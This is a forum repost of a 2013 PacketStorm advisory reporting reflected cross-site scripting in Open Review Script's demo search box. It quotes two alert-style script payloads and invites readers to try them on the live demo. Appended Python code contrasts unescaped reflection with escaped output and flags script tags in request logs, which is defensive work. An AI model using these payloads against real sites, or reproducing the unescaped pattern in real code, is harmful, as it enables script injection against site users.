Praetorian503 Posted February 19, 2013

Open Review Script suffers from a cross site scripting vulnerability.

#################################################################################
## [ASCII-art "janissaries" banner]                                             ##
## www.janissaries.org                                                          ##
###=====================================================================##
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
«««:»»» Open Review Script - Cross Site Scripting (XSS) attacks «««:»»»
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
./Title Exploit    : Open Review Script - Cross Site Scripting (XSS) attacks
./WebApps URL      : http://openreviewscript.org/
./WebApps Download : http://openreviewscript.org/files/OpenReviewScript-v1.0.1.zip
./Author Exploit   : [ TheMirkin ] [ th3mirkin@gmail.com.com ] [ All Janissaries ]
./Security Risk    : [ High Level ]
./Category XPL     : [ WebApps ]
./Time & Date      : 18.02.2013, 10:30 PM
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#################################################################################
#
# [~] XSS on Demo Site (Searchbox)
# http://openreviewscript.org/scriptdemo/results/search
#
# To try it, open the demo site and enter the XSS attack code in the search box.
#
# CAPS: http://www.hizliresimyukle.com/images/2013/02/18/d9YPV.png
#
# <ScRiPt >prompt(978524)</ScRiPt>
# <script>alert('TheMirkin')</script>
#
# xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx
#
# Special Thanks : Burtay and All Janissaries Team (Burtay, B127Y, Miyachung, 3spi0n, TheMirkin, Michelony, Mectruy)
#################################################################################

Source: PacketStorm
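The advisory above boils down to a search term being reflected into the results page without output encoding. As an added illustration (not part of the original post or of Open Review Script's code), the following shows the vulnerable reflection pattern next to its hardened form, and a small log check that flags requests to the demo search path carrying a script tag; the parameter name `q` and the log line are constructed assumptions, since the advisory names neither.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Payloads quoted in the advisory, reused here only as test input.
ADVISORY_PAYLOADS = [
    "<ScRiPt >prompt(978524)</ScRiPt>",
    "<script>alert('TheMirkin')</script>",
]


def render_results_unsafe(query: str) -> str:
    """Vulnerable pattern: the search term is reflected into HTML verbatim."""
    return f"<h2>Results for: {query}</h2>"


def render_results_safe(query: str) -> str:
    """Hardened pattern: HTML-encode at the output sink. quote=True also
    encodes \" and ', so the same helper is safe inside attribute values."""
    return f"<h2>Results for: {html.escape(query, quote=True)}</h2>"


# Case-insensitive so the mixed-case 'ScRiPt' variant is caught as well.
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)


def is_rendered_script(markup: str) -> bool:
    """True if the markup still contains a live <script> tag."""
    return SCRIPT_TAG.search(markup) is not None


# Constructed Apache combined-log line (assumption: the search box submits
# its term as GET parameter 'q'; the advisory does not name the parameter).
SAMPLE_LOG = (
    '203.0.113.5 - - [18/Feb/2013:22:30:00 +0000] '
    '"GET /scriptdemo/results/search?q=%3CScRiPt+%3Eprompt%28978524%29%3C%2FScRiPt%3E HTTP/1.1" 200 512'
)

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_search_params(log_line: str) -> dict:
    """Return {param: decoded value} for query parameters whose decoded value
    contains a script tag; empty dict when the request looks clean."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return {}
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    return {name: v for name, values in params.items()
            for v in values if is_rendered_script(v)}
```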